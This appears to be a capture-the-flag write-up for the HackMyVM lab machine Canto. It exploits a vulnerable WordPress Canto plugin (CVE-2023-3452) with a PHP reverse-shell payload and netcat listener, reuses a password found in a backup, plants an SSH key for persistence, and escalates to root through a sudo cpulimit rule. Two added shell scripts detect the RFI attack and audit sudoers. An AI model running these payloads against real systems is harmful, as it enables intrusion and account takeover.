Canto - hackmyvm

2025/1/11 11:35:29

Overview

Machine name: Canto

Difficulty: easy

Machine URL: https://hackmyvm.eu/machines/machine.php?vm=Canto

Local setup

Hypervisor: VirtualBox

Target IP (Canto): 192.168.130.53

Windows IP: 192.168.130.158

Kali IP: 192.168.130.166

Scanning

Start with nmap

nmap -sT -p0- 192.168.130.53 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
sudo nmap -sT -sV -sC -O -p$ports 192.168.130.53/32 -oA nmapscan/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 05:55 EDT
Nmap scan report for canto.lan (192.168.130.53)
Host is up (0.00084s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c6:af:18:21:fa:3f:3c:fc:9f:e4:ef:04:c9:16:cb:c7 (ECDSA)
|_  256 ba:0e:8f:0b:24:20:dc:75:b7:1b:04:a1:81:b6:6d:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Ubuntu))
|_http-generator: WordPress 6.5.3
|_http-server-header: Apache/2.4.57 (Ubuntu)
|_http-title: Canto
MAC Address: 08:00:27:73:D7:34 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds

HTTP

The site runs WordPress, so try wpscan first

wpscan --url http://192.168.130.53/ --plugins-detection aggressive -e u,ap --api-token=Vjt...
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.130.53/ [192.168.130.53]
[+] Started: Thu Aug  1 09:23:25 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.57 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.130.53/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.130.53/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.130.53/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.130.53/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:02 <==========> (702 / 702) 100.00% Time: 00:00:02
[i] The WordPress version could not be detected.

[+] WordPress theme in use: twentytwentyfour
 | Location: http://192.168.130.53/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://192.168.130.53/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | [!] Directory listing is enabled
 | Style URL: http://192.168.130.53/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.130.53/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:01:04 <=====> (106191 / 106191) 100.00% Time: 00:01:04
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.130.53/wp-content/plugins/akismet/
 | Last Updated: 2024-07-10T22:16:00.000Z
 | Readme: http://192.168.130.53/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.3
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/akismet/, status: 200
 |
 | Version: 5.3.2 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/akismet/readme.txt

[+] canto
 | Location: http://192.168.130.53/wp-content/plugins/canto/
 | Last Updated: 2024-07-17T04:18:00.000Z
 | Readme: http://192.168.130.53/wp-content/plugins/canto/readme.txt
 | [!] The version is out of date, the latest version is 3.0.9
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/canto/, status: 200
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: Canto <= 3.0.8 - Unauthenticated Blind SSRF
 |     References:
 |      - https://wpscan.com/vulnerability/29c89cc9-ad9f-4086-a762-8896eba031c6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28976
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28977
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28978
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24063
 |      - https://gist.github.com/p4nk4jv/87aebd999ce4b28063943480e95fd9e0
 |
 | [!] Title: Canto < 3.0.5 - Unauthenticated Remote File Inclusion
 |     Fixed in: 3.0.5
 |     References:
 |      - https://wpscan.com/vulnerability/9e2817c7-d4aa-4ed9-a3d7-18f3117ed810
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3452
 |
 | [!] Title: Canto < 3.0.7 - Unauthenticated RCE
 |     Fixed in: 3.0.7
 |     References:
 |      - https://wpscan.com/vulnerability/1595af73-6f97-4bc9-9cb2-14a55daaa2d4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25096
 |      - https://patchstack.com/database/vulnerability/canto/wordpress-canto-plugin-3-0-6-unauthenticated-remote-code-execution-rce-vulnerability
 |
 | [!] Title: Canto < 3.0.9 - Unauthenticated Remote File Inclusion
 |     Fixed in: 3.0.9
 |     References:
 |      - https://wpscan.com/vulnerability/3ea53721-bdf6-4203-b6bc-2565d6283159
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4936
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/95a68ae0-36da-499b-a09d-4c91db8aa338
 |
 | Version: 3.0.4 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/canto/readme.txt
 | Confirmed By: Composer File (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/canto/package.json, Match: '3.0.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=============> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] erik
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.130.53/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 21

The canto plugin has known vulnerabilities; look them up with searchsploit

Nothing more to say, just run the PoC

CVE-2023-3452

https://github.com/leoanggal1/CVE-2023-3452-PoC

First prepare a PHP file that spawns a reverse shell

<?php system("bash -c 'sh -i >& /dev/tcp/192.168.130.166/40000 0>&1'");?>

Then start a listener

rlwrap -cAr nc -lvvp 40000

Finally fire the PoC at the target

python3 CVE-2023-3452.py -u http://192.168.130.53 -LHOST 192.168.130.166  -s ./shell.php
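From the defender's side, the exploitation above leaves a recognisable trace in the web server log. The following is an added example, not part of the write-up or the PoC repository: it scans Apache combined-format access-log lines for remote-file-inclusion attempts against the Canto plugin, keying on a request under /wp-content/plugins/canto/ whose query string carries an absolute URL, plain or percent-encoded. The endpoint and parameter names in the sample lines follow public descriptions of CVE-2023-3452 and are an assumption here; the log lines themselves are constructed.

```shell
#!/bin/sh
# Added example (not from the original write-up). Detects RFI attempts against
# the Canto WordPress plugin in Apache access logs. Sample lines are constructed;
# the download.php / wp_abspath names are assumed from public CVE-2023-3452 notes.

SAMPLE_LOG=$(cat <<'EOF'
192.168.130.166 - - [01/Aug/2024:20:51:10 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://192.168.130.166:8080/ HTTP/1.1" 200 512 "-" "python-requests/2.31"
192.168.130.166 - - [01/Aug/2024:20:51:12 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=HTTP%3A%2F%2F192.168.130.166%3A8080%2F HTTP/1.1" 200 512 "-" "python-requests/2.31"
192.168.130.158 - - [01/Aug/2024:20:30:01 +0000] "GET /wp-content/plugins/canto/readme.txt HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.130.158 - - [01/Aug/2024:20:31:05 +0000] "GET /wp-admin/admin-ajax.php?action=oembed&url=http://example.com/ HTTP/1.1" 200 300 "-" "Mozilla/5.0"
EOF
)

detect_canto_rfi() {
    # Reads log lines on stdin; prints "client-ip request-target" for each hit.
    awk '
        {
            target = $7                                   # "/path?query" field
            if (target !~ /^\/wp-content\/plugins\/canto\//) next
            q = index(target, "?")
            if (q == 0) next                              # no query string at all
            query = tolower(substr(target, q + 1))
            # an absolute URL in the query: http:// or https://, literal or %3a%2f%2f
            if (query ~ /https?(:\/\/|%3a%2f%2f)/) print $1, target
        }'
}

count_canto_rfi() {
    # Number of suspicious lines in the input (useful as an alert threshold).
    detect_canto_rfi | awk 'END { print NR }'
}

printf '%s\n' "$SAMPLE_LOG" | detect_canto_rfi
```

Only the two requests that carry an external URL into the plugin are reported; the plugin readme fetch and the unrelated admin-ajax request with a URL parameter are left alone.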

Privilege escalation

Backups

A backup file containing credentials is found under /var/wordpress/backups

www-data@canto:/var/wordpress/backups$ su erik
su erik
Password: th1sIsTheP3ssw0rd!

erik@canto:/var/wordpress/backups$ cd
cd
erik@canto:~$ ls
ls
notes  user.txt
erik@canto:~$ id
id
uid=1001(erik) gid=1001(erik) groups=1001(erik)

Escalated to erik and got user.txt

While at it, drop a public key on the box to keep access

erik@canto:~$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
...
erik@canto:~/.ssh$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK5sWbMpzoFOhxwVIjKUYvvMce5kR6XSmnTp7u2TlCmW kali@kali" > authorized_keys

sudo privilege escalation

Check the sudo rights with sudo -l

erik@canto:/$ sudo -l
Matching Defaults entries for erik on canto:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User erik may run the following commands on canto:
    (ALL : ALL) NOPASSWD: /usr/bin/cpulimit

GTFOBins has a one-liner for this

erik@canto:/$ sudo /usr/bin/cpulimit -l 100 -f /bin/bash
Process 3024 detected
root@canto:/# cd
root@canto:~# id
uid=0(root) gid=0(root) groups=0(root)
root@canto:~# ls
root.txt  snap
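The root cause of the last step is a sudoers rule that names a bare path: in sudoers, a command with no argument list may be run with any arguments, so the -f flag of cpulimit (which launches a program) is fair game. The following added example, not from the write-up, audits sudoers-style rules for NOPASSWD entries that hand out such a binary without pinning its arguments. The sudoers excerpt is constructed, and the list of "spawning" binaries is a starter list assumed here (cpulimit is the one on this page).

```shell
#!/bin/sh
# Added example (not from the original write-up). Flags NOPASSWD sudoers rules
# that grant a program able to launch another command, when the rule leaves the
# arguments unrestricted. Sample rules and the binary list are constructed.

# Binaries that run an arbitrary program under sudo (assumed starter list).
SPAWNING_BINS="cpulimit"

# Constructed sudoers excerpt: one bare-path rule (any args allowed, the case on
# this machine), one rule with pinned arguments, and an unrelated rule.
SAMPLE_SUDOERS=$(cat <<'EOF'
# User privilege specification
root    ALL=(ALL:ALL) ALL
erik    ALL=(ALL : ALL) NOPASSWD: /usr/bin/cpulimit
backup  ALL=(root) NOPASSWD: /usr/bin/cpulimit -l 50 -p 1234, /usr/bin/systemctl restart apache2
EOF
)

audit_sudoers() {
    # Reads sudoers lines on stdin; prints "user /path" for every NOPASSWD
    # command whose basename is in SPAWNING_BINS and whose arguments are not
    # pinned (a bare path in sudoers permits ANY arguments, including -f).
    awk -v bins="$SPAWNING_BINS" '
        BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) risky[b[i]] = 1 }
        /^[ \t]*#/ || /^[ \t]*$/ { next }         # comments and blank lines
        !/NOPASSWD:/ { next }                     # only passwordless rules
        {
            user = $1
            sub(/.*NOPASSWD:[ \t]*/, "")          # keep the command list only
            m = split($0, cmds, ",")              # rules may list several commands
            for (i = 1; i <= m; i++) {
                cmd = cmds[i]
                sub(/^[ \t]+/, "", cmd); sub(/[ \t]+$/, "", cmd)
                nf = split(cmd, parts, " ")       # nf == 1 means no args pinned
                path = parts[1]
                base = path; sub(/.*\//, "", base)
                if (base in risky && nf == 1) print user, path
            }
        }'
}

printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers
```

The erik rule is the only finding; the remedy is to drop the rule or replace it with a fixed-purpose wrapper script, since pinning arguments with sudoers wildcards is itself easy to get wrong.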

Done
